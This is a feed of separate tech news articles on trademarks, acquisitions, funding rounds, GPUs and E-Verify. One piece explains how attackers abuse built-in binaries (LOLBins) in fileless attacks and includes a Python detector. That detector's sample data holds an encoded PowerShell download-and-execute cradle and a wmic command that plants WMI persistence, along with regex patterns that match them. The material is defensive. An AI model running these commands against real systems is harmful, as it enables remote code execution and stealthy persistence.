Google launches the Open Usage Commons, a new organization for managing open-source trademarks

Google, in collaboration with a number of academic leaders and its consulting partner SADA Systems, today announced the launch of the Open Usage Commons, a new organization that aims to help open-source projects manage their trademarks.

To be fair, at first glance, open-source trademarks may not sound like a major problem (or even a really interesting topic), but there’s more here than meets the eye. As Google’s director of open source Chris DiBona told me, trademarks have increasingly become an issue for open-source projects, not necessarily because there have been legal issues around them, but because commercial entities that want to use the logo or name of an open-source project on their websites, for example, don’t have the reassurance that they are free to use those trademarks.

“One of the things that’s been rearing its ugly head over the last couple years has been trademarks,” he told me. “There’s not a lot of trademarks in open-source software in general, but particularly at Google, and frankly the higher tier, the more popular open-source projects, you see them more and more over the last five years. If you look at open-source licensing, they don’t treat trademarks at all the way they do copyright and patents, even Apache, which is my favorite license, they basically say, nope, not touching it, not our problem, you go talk.”

Traditionally, open-source licenses didn’t cover trademarks because there simply weren’t a lot of trademarks in the ecosystem to worry about. One of the exceptions here was Linux, a trademark that is now managed by the Linux Mark Institute on behalf of Linus Torvalds.

With that, commercial companies aren’t sure how to handle this situation and developers also don’t know how to respond to these companies when they ask them questions about their trademarks.

“What we wanted to do is give guidance around how you can share trademarks in the same way that you would share patents and copyright in an open-source license […],” DiBona explained. “And the idea is to basically provide that guidance, you know, provide that trademarks file, if you will, that you include in your source code.”

Google itself is putting three of its own open-source trademarks into this new organization: the Angular web application framework for mobile, the Gerrit code review tool and the Istio service mesh. “All three of them are kind of perfect for this sort of experiment because they’re under active development at Google, they have a trademark associated with them, they have logos and, in some cases, a mascot.”

One of those mascots is Diffi, the Kung Fu Code Review Cuckoo, because, as DiBona noted, “we were trying to come up with literally the worst mascot we could possibly come up with.” It’s now up to the Open Usage Commons to manage that trademark.

DiBona also noted that all three projects have third parties shipping products based on these projects (think Gerrit as a service).

Another thing DiBona stressed is that this is an independent organization. Besides himself, Jen Phillips, a senior engineering manager for open source at Google is also on the board. But the team also brought in SADA’s CTO Miles Ward (who was previously at Google); Allison Randal, the architect of the Parrot virtual machine and member of the board of directors of the Perl Foundation and OpenStack Foundation, among others; Charles Lee Isbell Jr., the dean of the Georgia Institute of Technology College of Computing, and Cliff Lampe, a professor at the School of Information at the University of Michigan and a “rising star,” as DiBona pointed out.

“These are people who really have the best interests of computer science at heart, which is why we’re doing this,” DiBona noted. “Because the thing about open source — people talk about it all the time in the context of business and all the rest. The reason I got into it is because through open source we could work with other people in this sort of fertile middle space and sort of know what the deal was.”

Update: even though Google argues that the Open Usage Commons are complementary to other open source organizations, the Cloud Native Computing Foundation (CNCF) released the following statement by Chris Aniszczyk, the CNCF’s CTO: “Our community members are perplexed that Google has chosen to not contribute the Istio project to the Cloud Native Computing Foundation (CNCF), but we are happy to help guide them to resubmit their old project proposal from 2017 at any time. In the end, our community remains focused on building and supporting our service mesh projects like Envoy, linkerd and interoperability efforts like the Service Mesh Interface (SMI). The CNCF will continue to be the center of gravity of cloud native and service mesh collaboration and innovation.”


Slack snags corporate directory startup Rimeto to up its people search game

For the second time in less than 24 hours, an enterprise company bought an early-stage startup. Yesterday afternoon DocuSign acquired Liveoak, and this morning Slack announced it was buying corporate directory startup Rimeto, which should help employees find people inside the organization who match a specific set of criteria from inside Slack.

The companies did not share the purchase price.

Rimeto helps companies build directories to find employees beyond using tools like Microsoft Active Directory, homegrown tools or your corporate email program. When we covered the company’s $10 million Series A last year, we described what it brings to directories this way:

Rimeto has developed a richer directory by sitting between various corporate systems like HR, CRM and other tools that contain additional details about the employee. It of course includes a name, title, email and phone like the basic corporate system, but it goes beyond that to find areas of expertise, projects the person is working on and other details that can help you find the right person when you’re searching the directory.

In the build versus buy equation that companies balance all the time, it looks like Slack weighed the pros and cons and decided to buy. You could see how a tool like this would be useful to Slack as people try to build teams of employees, especially in a world where so many are working from home.

While the current Slack people search tool lets you search by name, role or team, Rimeto should give users a much more robust way of searching for employees across the company. You can search for the right person to help you with a particular problem and get much more granular with your search requirements than the current tool allows.


At the time of its funding announcement, the company, which was founded in 2016 by three former Facebook employees, told TechCrunch it had bootstrapped for the first three years before taking the $10 million investment last year. It also reported it was cash-flow positive at the time, which is pretty unusual for an early-stage enterprise SaaS company.

In a company blog post announcing the deal, as is typical in these deals, the founders saw being part of a larger organization as a way to grow more quickly than they could have alone. “Joining Slack is a special opportunity to accelerate Rimeto’s mission and impact with greater reach, expanded resources, and the support of Slack’s impressive global team,” the founders wrote in the post.

The acquisition is part of a continuing trend around enterprise companies buying early-stage startups to fill in holes in their product road maps.

PQShield raises $7M for quantum-ready cryptographic security solutions

A deep tech startup building cryptographic solutions to secure hardware, software and communications systems, for a future in which quantum computers may render many current cybersecurity approaches useless, is today emerging from stealth mode with $7 million in funding. Its mission is to make cryptographic security something that cannot be hacked, even with the most sophisticated systems, by building systems today that will continue to be usable in a post-quantum future.

PQShield (PQ being short for “post-quantum”), a spin out from Oxford University, is being backed in a seed round led by Kindred Capital, with participation also from Crane Venture Partners, Oxford Sciences Innovation and various angel investors, including Andre Crawford-Brunt, Deutsche Bank’s former global head of equities.

PQShield was founded in 2018, and its time in stealth has not been in vain.

The startup claims to have the UK’s highest concentration of cryptography PhDs outside academia and classified agencies, and it is one of the biggest contributors (alongside academic institutions and huge tech companies) to the NIST cybersecurity framework, which is working on creating new cryptographic standards that take into account the fact that quantum computing will likely make quick work of breaking the standards currently in place.

“The scale is massive,” Dr Ali El Kaafarani, a research fellow at Oxford’s Mathematical Institute, former engineer at Hewlett-Packard Labs, and founder and CEO of PQShield, said of that project. “For the first time we are changing the whole of public key infrastructure.”

And according to El Kaafarani, the startup has customers — companies that build hardware and software services, or run communications systems that deal with sensitive information and run the biggest risks from being hacked.

They include entities in the financial and government sectors that it’s not naming, as well as its first OEM customer, Bosch. El Kaafarani said in an interview that it is also in talks with at least one major communications and messaging provider exploring more security for end-to-end encryption on messaging networks. Other target applications could include keyless cars, connected IoT devices, and cloud services.

The gap in the market that PQShield is aiming to address is this: while a number of companies are already exploring the cutting edge of cryptographic security — among them large tech companies like Amazon and Microsoft, Hub Security, Duality, another UK startup focused on post-quantum cryptography called Post Quantum, and a number of others — the concern is that quantum computing will be utilised to crack even the most sophisticated cryptography, such as the RSA and Elliptic Curve cryptographic standards.

This has not been much of a threat so far since quantum computers are still not widely available and used, but there have been a number of signs of a breakthrough on the horizon.

El Kaafarani says that PQShield is the first startup to approach that predicament with a multi-pronged solution aimed at a variety of use cases, including solutions that encompass current cryptographic standards and provide a migration path to the next generation of those standards — meaning they can be commercially deployed today, even without quantum computers being a commercial reality, in preparation for that day.

“Whatever we encrypt now can be harvested, and once we have a fully functioning quantum computer people can use that to get back to the data and the sensitive information,” he said.

For hardware applications, it’s designed a System on Chip (SoC) solution that will be licensed to hardware manufacturers (Bosch being the first OEM). For software applications, there is an SDK that secures messaging and is protected by “post-quantum algorithms” based on a secure, Signal-derived protocol.

Thinking about and building for the full spectrum of applications is central to PQShield’s approach, he added. “In security it’s important to understand the whole ecosystem since everything is about connected components.”

Some sectors in the tech world have been especially negatively impacted by the coronavirus and its consequences, a predicament that has been exacerbated by uncertainties over the future of the global economy.

I asked El Kaafarani if that translated to a particularly tricky time to raise money as a deep tech startup, given that deep tech companies so often work on long-term problems that may not have immediate commercial outcomes.

Interestingly, he said that wasn’t the case.

“We talked to VCs that were interested in deep tech to begin with, which made the discussion a lot easier,” he said. “And the fact is that we’re a security company, and that is one of the areas that is doing well. Everything has become digitised, and we have all become more heavily reliant on our digital connections. We ultimately help make the digital world more secure. There are people who understand that, and so it wasn’t too difficult to talk to them and understand the importance of this company.”

Indeed, Chrysanthos Chrysanthou, partner at Kindred Capital, echoed that sentiment:

“With some of the brightest minds in cryptography, mathematics and engineering, and boasting world-class software and hardware solutions, PQShield is uniquely positioned to lead the charge in protecting businesses from one of the most profound threats to their future,” he said. “We couldn’t be happier to support the team as it works to set a new standard for information security and defuse risks resulting from the rise of quantum.”

Tech shares set fresh records despite uncertain economy

Despite record-setting COVID-19 infections, American equities rose today. All major indices gained ground during regular trading, while tech stocks did even better.

The Nasdaq Composite set new 52-week and all-time highs, touching 10,462.0 points before closing at 10,433.65, up 2.21% on the day. Similarly, a basket of SaaS and cloud companies that has risen and fallen more sharply than even the tech-heavy Nasdaq closed this afternoon at 1,908.30 after touching 1,952.39 points. Both results were 52-week and all-time highs.

Such is the mood on Wall Street regarding the health of technology companies. It’s not hard to find bullish sentiment, jockeying to push tech shares higher. Some examples of today’s enthusiasm paint the picture:

  • The recent IPO for Lemonade is now worth $4.7 billion, according to Yahoo Finance. That price gives it a Q1-annualized revenue run rate multiple of around 45x. For a SaaS company, that would boggle the mind. As we’ve written, however, Lemonade has very un-SaaS-like gross margins, and has higher churn. The company’s stock rose around 17% today for no clear reason.
  • Tesla rose over 13% today to $1,371.58 per share, another huge day of gains for the company now worth in excess of $250 billion. Analysts expect the firm to report $4.83 billion in revenue in its most recent quarter, according to Yahoo Finance. That’s less than the company reported in its year-ago June quarter when it saw $6.35 billion in revenue. Since July 1, 2019, Tesla shares have appreciated in excess of 450%, despite the company prepping to report what the market anticipates will be revenue declines.
  • Amazon and Netflix also set new records today to toss a few more names into the mix.

You can’t swing your arms without running into a reason why it makes sense for SaaS stocks to be trading at record valuation multiples, or why one company or another is actually reasonably valued over a long-enough time horizon.

It’s worth noting that this putatively rational public investor thinking doesn’t fit at all with what the tech set used to pound into my head about the public markets, namely that they are infamously impatient and thus utter bilge for most long-term value creation. Going public was garbage, I was told; you have to report every three months and no one looks out a few years.

Now, I’m being told by roughly the same people that the market is doing the very thing that they said it didn’t do, namely price firms for future results instead of trailing outcomes. Fine by me either way, frankly, but I’d like to know which story is true.

Happily, we’re about to see if all this high-fiving and enthusiasm is real.

Earnings season beckons, and it should bring with it a dose or two of clarity. If the digital transformation has managed to accelerate sufficiently that most tech companies have managed to greatly boost their near-term value, hats off to the cohort and bully for the startups that must also be enjoying similar revenue upswells.

But that doesn’t have to happen. There are possible earnings result sets that can cause investors to dump tech shares, as Slack learned a month ago.

The background to all of this is that there are good reasons to have some doubts about the current health of the national economy. And, sure, most people are willing to allow that the stock market and the aggregate domestic economy are not perfectly linked — which is at least partially true — but each day that the stock market steps higher while COVID-19 surges again, leading to re-closings around the nation, makes you wonder if this is all for real.

Earnings season is here soon. Let’s find out.

Nayya, bringing transparency to choosing and managing healthcare plans, raises $2.7 million

Entrepreneurs Roundtable Accelerator-backed Nayya is on a mission to simplify choosing and managing employee benefits through machine learning and data transparency.

The company has raised $2.7 million in seed funding led by Social Leverage, with participation from Guardian Strategic Ventures, Cameron Ventures, Soma Capital, as well as other strategic angels.

The process of choosing an employer-provided healthcare plan and understanding that plan can be tedious at best and incredibly confusing at worst. And that doesn’t even include all of the supplemental plans and benefits associated with these programs.

Co-founded by Sina Chehrazi and Akash Magoon, Nayya tries to solve this problem. When enrollment starts, employers send out an email that includes a link to Nayya’s Companion, the company’s flagship product.

Companion helps employees find the plan that is right for them. The software first asks a series of questions about lifestyle, location, etc. For example, Nayya co-founder and CEO Chehrazi explained that people who bike to work, as opposed to driving in a car, walking or taking public transportation, are 20 times more likely to get into an accident and need emergency services.

Companion asks questions in this vein, as well as questions around whether you take medication regularly or if you expect your healthcare costs to go up or down over the next year, without getting into the specifics of chronic ailments or diseases or particular issues.

Taking that data into account, Nayya then looks at the various plans provided by the employer and shows the user which one best matches their particular lifestyle and budget.

Nayya doesn’t just pull information directly from the insurance company directory listings, as nearly 40% of those listings have at least one error or are out of date. It pulls from a broad variety of data sources, including the Centers for Medicare and Medicaid Services (CMS), to get the cleanest, most precise data around which doctors are in network and the usual costs associated with visiting those doctors.

Alongside Companion, Nayya also provides a product called “Edison,” which it has dubbed the Alexa for Healthcare. Users can ask Edison questions like “What is my deductible?” or “Is Dr. So-and-So in my network and what would it cost to go see her?”

The company helps individual users find the right provider for them with the ability to compare costs, location and other factors involved. Nayya even puts a badge on listings for providers where another employee at the company has gone and had a great experience, giving another layer of validation to that choice.

As the healthtech industry looks to provide easier-to-use healthcare and insurance, the idea of “personalization” has been left behind in many respects. Nayya focuses first and foremost on the end-user and aims to ensure that their own personal healthcare journey is as simple and straightforward as possible, believing that the other pieces of the puzzle will fall into place when the customer is taken care of.

Nayya plans on using the funding to expand the team across engineering, data science, product management and marketing, as well as doubling down on the amount of data the company is purchasing, ingesting and cleaning.

Alongside charging employers on a per-seat, per-month basis, Nayya is also looking to start going straight to insurance companies with its product.

“The greatest challenge is educating an entire ecosystem and convincing that ecosystem to believe that where the consumer wins, everyone wins,” said Chehrazi. “How to finance and understand your healthcare has never been more important than it is right now, and there is a huge need to provide that education in a data driven way to people. That’s where I want to spend the next I don’t know how many years of my life to drive that change.”

Nayya has five full-time employees currently and 80% of the team comes from racially diverse backgrounds.

OwnBackup lands $50M as backup for Salesforce ecosystem thrives

OwnBackup has made a name for itself primarily as a backup and disaster recovery system for the Salesforce ecosystem, and today the company announced a $50 million investment.

Insight Partners led the round, with participation from Salesforce Ventures and Vertex Ventures. This chunk of money comes on top of a $23 million round from a year ago, and brings the total raised to more than $100 million, according to the company.

It shouldn’t come as a surprise that Salesforce Ventures chipped in when the majority of the company’s backup and recovery business involves the Salesforce ecosystem, although the company will be looking to expand beyond that with the new money.

“We’ve seen such growth over the last two and a half years around the Salesforce ecosystem, and the other ISV partners like Veeva and nCino that we’ve remained focused within the Salesforce space. But with this funding, we will expand over the next 12 months into a few new ecosystems,” company CEO Sam Gutmann told TechCrunch.

In spite of the pandemic, the company continues to grow, adding 250 new customers last quarter, bringing it to over 2,000 customers and 250 employees, according to Gutmann.

He says that raising the round, which closed at the beginning of May, had some hairy moments as the pandemic began to take hold across the world and worsen in the U.S. For a time, he began talking to new investors in case his existing ones got cold feet. As it turned out, when the quarterly numbers came in strong, the existing ones came back and the round was oversubscribed, Gutmann said.

“Q2 frankly was a record quarter for us, adding over 250 new accounts, and we’re seeing companies start to really understand how critical this is,” he said.

The company plans to continue hiring through the pandemic, although he says it might not be quite as aggressive as they once thought. Like many companies, even though they plan to hire, they are continually assessing the market. At this point, he foresees growing the workforce by about another 50 people this year, but that’s about as far as he can look ahead right now.

Gutmann says he is working with his management team to make sure he has a diverse workforce right up to the executive level, but he says it’s challenging. “I think our lower ranks are actually quite diverse, but as you get up into the leadership team, you can see on the website unfortunately we’re not there yet,” he said.

They are instructing their recruiting teams to look for diverse candidates whether by gender or ethnicity, and employees have formed a diversity and inclusion task force with internal training, particularly for managers around interviewing techniques.

He says going remote has been difficult, and he misses seeing his employees in the office. He hopes to have at least some come back before the end of the summer and slowly add more as we get into the fall, but that will depend on how things go.

Zoom announces new Hardware as a Service offering to run on ServiceNow

Zoom announced a new Hardware as a Service offering today that will run on the ServiceNow platform. At the same time, the company announced a deal with ServiceNow to standardize on Zoom and Zoom Phone for its 11,000 employees in another case of SaaS cooperation.

For starters, the new Hardware as a Service offering allows customers, who use the Zoom Phone and Zoom Rooms software, to acquire related hardware from the company for a fixed monthly cost. The company announced that initial solutions providers will include DTEN, Neat, Poly and Yealink.

The new service allows companies to access low-cost hardware and pay for the software and hardware on a single invoice. This could result in lower up-front costs, while simplifying the bookkeeping associated with a customer’s online communications options.

Companies can start small if they wish, then add additional hardware over time as needs change, and they can also opt for a fully managed service, where a third party can deal with installation and management of the hardware if that’s what a customer requires.

Zoom will run the new service on ServiceNow’s Now platform, which provides a way to manage the service requests as they come in. And in a case of one SaaS hand washing the other, ServiceNow has standardized on the Zoom platform for its internal communications tool, which has become increasingly important as the pandemic has moved employees to work from home. The company also plans to replace its current phone system with Zoom Phones.

One of the defining characteristics of SaaS companies, and a major difference from previous generations of tech companies, has been the willingness of these organizations to work together to string together sets of services when it makes sense. These kinds of partnerships not only benefit the companies involved, they tend to be a win for customers too.

Brent Leary, founder at CRM Essentials, sees this as a deal between two rising SaaS stars, and one that benefits both companies. “Everyone and their mother is announcing partnerships with Zoom, focusing on integrating video communications into core focus areas. But this partnership looks to be much more substantial than most, with ServiceNow not only partnering with Zoom for tighter video communication capabilities, but also displacing its current phone system with Zoom Phone,” Leary told TechCrunch.

Nvidia’s Ampere GPUs come to Google Cloud

Nvidia today announced that its new Ampere-based data center GPUs, the A100 Tensor Core GPUs, are now available in alpha on Google Cloud. As the name implies, these GPUs were designed for AI workloads, as well as data analytics and high-performance computing solutions.

The A100 promises a significant performance improvement over previous generations. Nvidia says the A100 can boost training and inference performance by over 20x compared to its predecessors (though you’ll mostly see 6x or 7x improvements in most benchmarks) and tops out at about 19.5 TFLOPs in single-precision performance and 156 TFLOPs for Tensor Float 32 workloads.


“Google Cloud customers often look to us to provide the latest hardware and software services to help them drive innovation on AI and scientific computing workloads,” said Manish Sainani, Director of Product Management at Google Cloud, in today’s announcement. “With our new A2 VM family, we are proud to be the first major cloud provider to market Nvidia A100 GPUs, just as we were with Nvidia’s T4 GPUs. We are excited to see what our customers will do with these new capabilities.”

Google Cloud users can get access to instances with up to 16 of these A100 GPUs, for a total of 640GB of GPU memory and 1.3TB of system memory.

How Do Attackers Use LOLBins In Fileless Attacks?

For malware authors, the idea of exploiting existing software on a user’s machine to achieve malicious purposes has a lot of attractions. For one, it means less work for them in developing custom malware. For another, it means less chance of being detected. After all, if you can hijack an existing and trusted piece of software to achieve your ends, the chances are better that you’ll go undetected. This technique, known as “Living off the Land”, has a long history, but it’s not getting old.

New “Living off the Land” binaries, or LOLBins, can appear with any software or OS update, or may have been lying around with undocumented abilities for some time: researchers at SentinelLabs just disclosed a previously unknown LOLBin, for example. In this post, we dig into what LOLBins are, why they are a concern, and most importantly how you can detect their malicious use.

What is a LOLBin?

Any executable that comes installed as part of your operating system by default and that can be used to further an attack can be considered a LOLBin. In addition, executables added by users for legitimate purposes could be exploited as LOLBins, particularly if they are part of some common or widely used 3rd party software installation.

The key to understanding what a LOLBin is revolves less around its origin and more around whether the executable is found on the system prior to the malware attack.

In such cases, that executable is likely to be treated without suspicion by both users and admins and potentially even whitelisted as benign by some security tools.

In targeted attacks, an actor may first surveil a system for LOLBins unique to the victim’s environment, but typically attackers are interested in efficiency and prefer to write malware that will make use of commonly found executables, such as scripting engines like bash and PowerShell, as well as utilities like msiexec, PsExec and desktopimgdownldr, which have unexpected or little-known capabilities useful to threat actors. On macOS, osascript is a LOLBin widely exploited by attackers for executing malicious AppleScripts.

Aside from being potentially ignored by both users and security tools, LOLBins like those just mentioned can allow malicious actors to communicate with remote servers and blend in with typical network activity. Other LOLBins may help attackers to perform functions such as compile code, achieve persistence, dump processes and hijack DLLs.

How Do Attackers Use LOLBins In Fileless Attacks?

Fileless attacks have been increasing in recent years, although there is some misunderstanding about exactly what makes an attack ‘fileless’. Such attacks may still be initiated through documents (like email attachments) and they may leave behind files (like persistence agents), but what makes them fileless is that the code is executed in-memory.

The main idea behind a fileless attack is that code execution occurs in-memory rather than by spawning a process that executes compiled code from a source file.

This means that the attack cannot be detected just by scanning a system for malicious binaries or executable files. In addition, once memory has been purged (such as by a reboot) there may be little or no evidence of the attack for incident responders and threat hunters to detect.

A typical scenario for a fileless attack might begin with a phishing attempt, in which the target is socially-engineered to click on a malicious link or attachment. This may execute JavaScript or VBScript or call a LOLBin like PowerShell to download and execute malicious code in-memory.

This second-stage payload may go on to use other LOLBins like WMI (Windows Management Instrumentation) to execute code to do things like achieve persistence, open a backdoor or contact a C2 server to exfiltrate data. Fileless attacks may be combined with other threats such as ransomware and keyloggers.

What Are Some Examples of Fileless Attacks Using LOLBins?

Fileless attacks using LOLBins are quite common and have been documented on Windows, Linux and Mac platforms. Indeed, insofar as the attack can hijack native tools that either exist on all platforms or have equivalents, these kinds of attacks can be platform-agnostic. APT group Lazarus, for example, has been observed distributing MS Word documents that will execute an in-memory attack using LOLBins regardless of whether the attachment is opened on Windows or a Mac.

Image: Visual Basic “Sub AutoRun” macro

Among the more high-profile attacks that have leveraged LOLBins and a fileless attack vector were the 2016 breach of the DNC (Democratic National Committee) and the 2017 attack on Equifax, which resulted in billion-dollar losses for the company and the exposure of records belonging to nearly 150 million people.

Why Do Security Researchers Worry About LOLBins?

As we have seen, LOLBins present a problem because they are a legitimate part of the environment that can be turned to do the threat actors’ work for them. Of course, some LOLBins like PowerShell are well known and can be monitored and/or locked down to prevent abuse.

However, keeping an inventory of the functionality of every legitimate executable on a system, and of whether it could be leveraged for malicious purposes, isn’t really practical. Not only do operating systems contain a vast number of built-in binaries that are added to or updated with new functionality all the time, there is also a massive amount of widely used third-party software in the enterprise environment whose full functionality may not be documented.

As a result, security practitioners are continually engaged in research to unearth new or undiscovered LOLBins before attackers do.

But even once a LOLBin has been identified, there remains the problem of how to deal with a legitimate tool so as to ensure it is used only for its intended purpose.

How Can You Detect the Malicious Use of LOLBins?

With no recognizable file signature and constantly changing C2 IP addresses, security teams can find themselves in a wearying game of whack-a-mole, chasing stealthy attacks that their current tools are not equipped to handle.

In many scenarios, it is simply not effective to block LOLBins that may be essential to the productivity of some of the teams in your organization.

The key to defeating attacks leveraging LOLBins lies in a behavioral AI engine that detects malicious behavior based on what code does, rather than where it comes from. Rather than inspecting files to see if they contain known malicious code, a behavioral engine looks at activity on the endpoint, such as process lineage, command lines and network connections, and distinguishes between malicious and benign sequences of actions.

Using that contextual information, the agent can not only recognize that some activity is malicious, but can also attribute it to its actual source, the document or script that started the chain, rather than laying the blame at the door of the native tool that the malicious process invoked.
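The attack chain sketched earlier (a document launching PowerShell, which pulls a second stage into memory and then turns to WMI for persistence) and the behavior-based detection argued for here can be made concrete. What follows is an added example, not code from the original article or from SentinelOne: a small Python detector run over constructed Sysmon-style process-creation records. The field names (ParentImage, Image, CommandLine), the sample command lines, the process paths and the IP address are all constructed for illustration, and the rules are deliberately simple; the point is to show what judging behavior rather than file content looks like on ordinary endpoint telemetry.

```python
"""Added example, not code from the original article: a small detector run over
constructed Sysmon-style process-creation records. It flags an Office document
spawning a script host, a PowerShell download cradle hidden behind
-EncodedCommand, and wmic.exe planting a permanent WMI event subscription."""
import base64
import json
import re
from dataclasses import dataclass
from typing import List, Optional

# Document readers that should essentially never launch a script host directly.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Native Windows binaries worth scrutiny when a document reader launches them.
WATCHED_CHILDREN = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                    "wmic.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}
# Markers of an in-memory download-and-execute cradle.
CRADLE_PATTERNS = [
    re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    re.compile(r"FromBase64String|Reflection\.Assembly\]::Load", re.I),
]
# Classes that make up a permanent WMI event subscription (fileless persistence).
WMI_PERSISTENCE = re.compile(
    r"__EventFilter|CommandLineEventConsumer|ActiveScriptEventConsumer|__FilterToConsumerBinding", re.I)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    rule: str
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Plaintext behind -EncodedCommand, or None. powershell.exe accepts any
    unambiguous prefix (-e, -ec, -enc ...) and expects base64 over UTF-16LE."""
    tokens = command_line.split()
    for flag, blob in zip(tokens, tokens[1:]):
        name = flag[1:].lower() if flag[:1] in "-/" else ""
        if not name or not "encodedcommand".startswith(name):
            continue
        try:
            return base64.b64decode(blob.strip("\"'"), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            return None
    return None


def analyse(ev: ProcessEvent) -> List[Finding]:
    findings: List[Finding] = []
    parent, child, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line
    if parent in OFFICE_PARENTS and child in WATCHED_CHILDREN:
        findings.append(Finding("office-spawns-lolbin", f"{parent} -> {child}"))
    decoded = decode_encoded_command(cmd) if child in ("powershell.exe", "pwsh.exe") else None
    if decoded is not None:
        findings.append(Finding("encoded-powershell", decoded))
    # Inspect what the base64 was hiding first, then the visible command line.
    for text in filter(None, (decoded, cmd)):
        if any(p.search(text) for p in CRADLE_PATTERNS):
            findings.append(Finding("download-cradle", text))
            break
    if any(WMI_PERSISTENCE.search(text) for text in filter(None, (cmd, decoded))):
        findings.append(Finding("wmi-persistence", cmd))
    return findings


# Constructed sample records in the JSON-lines shape a SIEM might export; field
# names follow Sysmon Event ID 1. The IP address is from a documentation range.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    json.dumps({"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"}),
    r'''{"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
        "CommandLine": "wmic.exe /NAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter CREATE '''
    r'''Name=\"Updater\", EventNameSpace=\"root\\cimv2\", QueryLanguage=\"WQL\", Query=\"SELECT * FROM '''
    r'''__InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\""}''',
    r'''{"ParentImage": "C:\\Windows\\explorer.exe",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"}''',
    r'''{"ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
        "CommandLine": "wmic.exe os get caption"}''',
]


def parse_event(line: str) -> ProcessEvent:
    rec = json.loads(line)
    return ProcessEvent(rec["ParentImage"], rec["Image"], rec["CommandLine"])


def run(lines: List[str] = SAMPLE_LOG) -> List[List[str]]:
    """Names of the rules that fired for each record, in order."""
    return [[f.rule for f in analyse(parse_event(line))] for line in lines]


if __name__ == "__main__":
    for ev in map(parse_event, SAMPLE_LOG):
        hits = ", ".join(f"{f.rule} ({f.detail[:60]})" for f in analyse(ev)) or "clean"
        print(f"{basename(ev.parent_image)} -> {basename(ev.image)}: {hits}")
```

Running the script prints one line per record: the Word-spawned PowerShell trips all three rules, the wmic.exe subscription trips the persistence rule, and the two administrative invocations of the same binaries stay clean. That is the practical point: powershell.exe and wmic.exe are never the indicator by themselves; the parent that launched them, the decoded command line and the WMI classes being created are what separate abuse from legitimate use. The first rule will also fire on a benign macro that launches PowerShell, which is why the decoded content and the parent-child pair are weighed together rather than blocked individually.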

Conclusion

Stealth is one of every threat actor’s primary objectives, and native binaries (LOLBins) provide perfect camouflage for malware that wants to hide in plain sight. While it’s vital that we continue to research the capabilities of the tools already in our environments, the task of detecting malicious processes on execution, regardless of their source, is one that readily lends itself to automated, machine-learning-based detection. If you would like to see how SentinelOne can help protect your organization against all kinds of threat actors, contact us for a free demo.


E-Verify’s “SSN Lock” is Nothing of the Sort

One of the most-read advice columns on this site is a 2018 piece called “Plant Your Flag, Mark Your Territory,” which tried to impress upon readers the importance of creating accounts at websites like those at the Social Security Administration, the IRS and others before crooks do it for you. A key concept here is that these services only allow one account per Social Security number — which for better or worse is the de facto national identifier in the United States. But KrebsOnSecurity recently discovered that this is not the case with all federal government sites built to help you manage your identity online.

A reader who was recently the victim of unemployment insurance fraud said he was told he should create an account at the Department of Homeland Security’s myE-Verify website, and place a lock on his Social Security number (SSN) to minimize the chances that ID thieves might abuse his identity for employment fraud in the future.

DHS’s myE-Verify homepage.

According to the website, roughly 600,000 employers at over 1.9 million hiring sites use E-Verify to confirm the employment eligibility of new employees. E-Verify’s consumer-facing portal myE-Verify lets users track and manage employment inquiries made through the E-Verify system. It also features a “Self Lock” designed to prevent the misuse of one’s SSN in E-Verify.

Enabling this lock is supposed to mean that for the following year, if an unauthorized individual attempts to fraudulently use the SSN for employment authorization, he or she cannot use it in E-Verify, even if the SSN belongs to an employment-authorized individual. But in practice, this service may do little to deter ID thieves from impersonating you to a potential employer.

At the request of the reader who reached out (and in the interest of following my own advice to plant one’s flag), KrebsOnSecurity decided to sign up for a myE-Verify account. After verifying my email address, I was asked to pick a strong password and select a form of multi-factor authentication (MFA). The most secure MFA option offered (a one-time code generated by an app like Google Authenticator or Authy) was already pre-selected, so I chose that.

The site requested my name, address, SSN, date of birth and phone number. I was then asked to select five questions and answers that might be asked if I were to try to reset my password, such as “In what city/town did you meet your spouse,” and “What is the name of the company of your first paid job.” I chose long, gibberish answers that had nothing to do with the questions (yes, these password questions are next to useless for security and frequently are the cause of account takeovers, but we’ll get to that in a minute).

Password reset questions selected, the site proceeded to ask four, multiple-guess “knowledge-based authentication” questions to verify my identity. The U.S. Federal Trade Commission’s primer page on preventing job-related ID theft says people who have placed a security freeze on their credit files with the major credit bureaus will need to lift or thaw the freeze before being able to answer these questions successfully at myE-Verify. However, I did not find that to be the case, even though my credit file has been frozen with the major bureaus for years.

After successfully answering the KBA questions (the answer to each was “none of the above,” by the way), the site declared I’d successfully created my account! I could then see that I had the option to place a “Self Lock” on my SSN within the E-Verify system.

Doing so required me to pick three more challenge questions and answers. The site didn’t explain why it was asking me to do this, but I assumed it would prompt me for the answers in the event that I later chose to unlock my SSN within E-Verify.

After selecting and answering those questions and clicking the “Lock my SSN” button, the site generated an error message saying something went wrong and it couldn’t proceed.

Alas, logging out and logging back in again showed that the site did in fact proceed and that my SSN was locked. Joy.

